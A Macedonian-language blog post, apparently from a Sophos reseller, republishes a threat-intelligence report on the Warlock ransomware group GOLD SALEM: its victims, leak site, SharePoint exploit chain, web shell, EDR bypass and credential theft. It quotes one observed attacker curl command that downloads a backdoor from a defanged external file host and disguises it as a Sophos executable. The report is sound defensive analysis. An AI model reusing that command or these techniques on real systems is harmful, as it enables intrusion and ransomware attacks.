icon
Have any questions?
Call: +38923103230

News & Blog

Warlock-ransomware-sophos-kabtel
Cyber security News & Events news&blog Recommendations Бекап ИТ Решенија Кибер безбедност

Новиот ransomware Warlock на GOLD SALEM во акција

Операцијата Warlock на групацијата GOLD SALEM се приклучува на пренатрупаниот пејзаж со ransomware
Новата група демонстрира компетентни вештини користејќи познат прирачник за рансомвер и навестувања за генијалност.
Истражувачите на Counter Threat Unit™ (CTU) следат група закани која себеси се нарекува Warlock Group. Групата, која истражувачите на CTU™ ја следат како GOLD SALEM , компромитирала мрежи и го распоредила својот Warlock ransomware од март 2025 година. Microsoft ја нарекува оваа група закани Storm-2603 и ја карактеризира „со умерена доверба дека е заканувачка со седиште во Кина“, но истражувачите на CTU немаат доволно докази за да го потврдат ова припишување.
Виктимологија и онлајн активност

60-те објавени жртви на групата до средината на септември 2025 година ја рангираат во средината, во споредба со другите операции со ransomware во истиот период. Жртвите на GOLD SALEM се од мали комерцијални или владини субјекти до големи мултинационални корпорации распространети низ Северна Америка, Европа и Јужна Америка. Како и повеќето групи со ransomware, GOLD SALEM во голема мера избегнуваше компромитирање на организации лоцирани во Кина и Русија и покрај големиот број потенцијални цели. Сепак, групата го објави името на жртвата со седиште во Русија на својата наменска локација за протекување (DLS) на 8 септември. Комерцијалниот субјект обезбедува инженерски услуги и опрема за индустријата за производство на електрична енергија.

GOLD SALEM немаше јавно присуство сè до објавата на подземниот форум RAMP во јуни 2025 година од страна на личност што ја претставуваше групата, која бараше експлоатации за вообичаени корпоративни апликации (на пр., Veeam, ESXi, SharePoint) и алатки за уништување на системи за откривање и одговор на крајни точки (EDR) и други безбедносни производи. Во последователна објава се бараше соработка од брокери за почетен пристап (IAB) во обезбедувањето потенцијални жртви. Не е јасно дали групата барала пристап за да ги изврши сопствените упади, регрутирала филијали за нова операција ransomware-as-a-service (RaaS) или и двете.

GOLD SALEM управува со DLS базиран на Tor (The Onion Router – мрежа што го маскира онлајн сообраќајот). за објавување на наводни имиња на жртви и податоци украдени од тие жртви. Од 16 септември 32% од жртвите беа објавени на DLS. Дополнително, заканувачките актери тврдат дека продале податоци од 45% од жртвите на приватни купувачи, потенцијално како одговор на неплаќањето откуп. Познато е дека кибер-криминалните групи повремено продаваат украдени податоци на трети страни, но бројките објавени од GOLD SALEM веројатно се зголемени или измислени. Три имиња на жртви претходно наведени на DLS беа последователно отстранети.

GOLD SALEM ги објави имињата на жртвите компромитирани од различни операции со ransomware. Иако се случуваат ретко, овие објави можат да претставуваат брокери за почетен пристап (IAB), актери на закана кои им продаваат на сајбер-криминалците пристап до мрежите на организациите, филијали кои објавуваат украдени податоци на повеќе страници за протекување на ransomware или неуспех на жртвата ефикасно да ги поправи вообичаените почетни вектори на пристап, што доведува до повторени компромитирања. На пример, американски комерцијален градежен изведувач со седиште во САД, наводно на кој му е украден пристапот на почетокот на јуни 2025 година, претходно бил жртва на ransomware-от Hunters International на GOLD CRESCENT во октомври 2024 година и од Payout Kings во јуни 2025 година.

Податоците објавени од GOLD SALEM и метаподатоците извлечени од нивниот DLS сугерираат дека групата започнала да напаѓа и изнудува жртви во март 2025 година. Објава од 10 јуни на форумот RAMP го најави Warlock и вклучи линк до првата итерација на DLS базиран на Tor. Адресата Tor беше исклучена на 11 јуни, а нова страница се појави дури кон крајот на јули. GOLD SALEM има тенденција да објавува на DLS во серии, што резултира со тоа што жртвите се појавуваат неколку дена до неколку недели по вистинското компромитирање. На секоја жртва ѝ е доделен датум за „одбројување“ што го означува крајниот рок за плаќање на откупот (видете ја сликата подолу). Овој датум е обично 12-14 дена откако жртвата се појавува на DLS.

Табела што ги прикажува датумите на одбројување доделени на жртвите од GOLD SALEM, што укажува кога мора да се платат откупи за да се избегне објавување на украдените податоци.

Слика: Датумите за одбројување наведени на DLS на GOLD SALEM од 16 септември 2025 година

Набљудувани инциденти

Кон крајот на јули, истражувачите на CTU анализираа инцидент во кој GOLD SALEM го користеше синџирот на експлоатација на ToolShell против серверите на SharePoint за почетен пристап. Овој синџир на експлоатација се потпира на користење на комбинација од ранливости CVE-2025-49704 , CVE-2025-49706 , CVE-2025-53770 и CVE-2025-53771 . Експлоатацијата резултираше со поставување на ASPX веб-школка што создаде објект Process за cmd.exe во контекст на работниот процес на IIS (w3wp.exe). Напаѓачот потоа можеше далечински да извршува произволни команди и да му се прикаже секој добиен излез. Истражувачите на CTU ја забележаа следната команда издадена преку оваа веб-школка:

curl -L -oc:\\users\\public\\Sophos\\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt

Преземената извршна датотека беше сервер WebSockets базиран на Golang кој дозволуваше континуиран пристап до компромитираниот сервер независно од веб-шелот. Истражувачите на CTU, исто така, забележаа дека GOLD SALEM го заобиколува EDR користејќи ја техниката Bring Your Own Vulnerable Driver (BYOVD) и ранлив драјвер на Baidu Antivirus преименуван во googleApiUtil64.sys за да го прекине EDR агентот. Маана во овој драјвер ( CVE-2024-51324 ) овозможува прекинување на произволни процеси.

Во профилот на „Microsoft“ за групата е забележано извршувањето на Mimikatz „специфично насочено кон меморијата на Local Security Authority Subsystem Service (LSASS) за извлекување на акредитиви со чист текст“. „Microsoft“ исто така ја забележа употребата на PsExec и Impacket за латерално движење и употребата на Group Policy Objects (GPO) за распоредување на Warlock payload.

Во август, истражувачите на CTU забележаа дека GOLD SALEM ја злоупотребува легитимната алатка со отворен код Velociraptor за дигитална форензика и одговор на инциденти (DFIR) за да воспостави мрежен тунел на Visual Studio Code во рамките на компромитираната средина. Некои од овие инциденти завршија со распоредување на Warlock ransomware.

Ублажување и детекции

Организациите треба да спроведуваат редовно следење на површината на нападите и да имаат агресивни политики за закрпување за услугите што се поврзани со интернет. Детекцијата и ублажувањето на експлоатацијата од нулти ден бараат проактивно следење на крајните точки и навремен одговор на инциденти.

Следните Sophos заштити детектираат активност поврзана со оваа закана:

  • Troj/WebShel-F
  • Troj/Warlock-B
За авторот

Истражувачите на Sophos Counter Threat Unit™ (CTU) се признати авторитети во областа на сајбер безбедноста, редовно придонесуваат со експертски анализи за глобалните медиуми, објавуваат технички анализи за безбедносната заедница и презентираат за новите закани на водечките безбедносни конференции. Поддржан од напредните безбедносни технологии на Sophos и широка мрежа на разузнавачки контакти и партнери, CTU™ игра клучна улога во идентификувањето и следењето на заканите и анализата на аномалните активности, откривањето нови техники на напад, закани и големи промени во пејзажот на закани.

Решенијата на Sophos се достапни во КАБТЕЛ, Sophos Platinum Partner.  Дознајте повеќе за ransomware и останатите закани, но и контактирајте нѐ за перпораки како да го заштитите вашиот бизнис.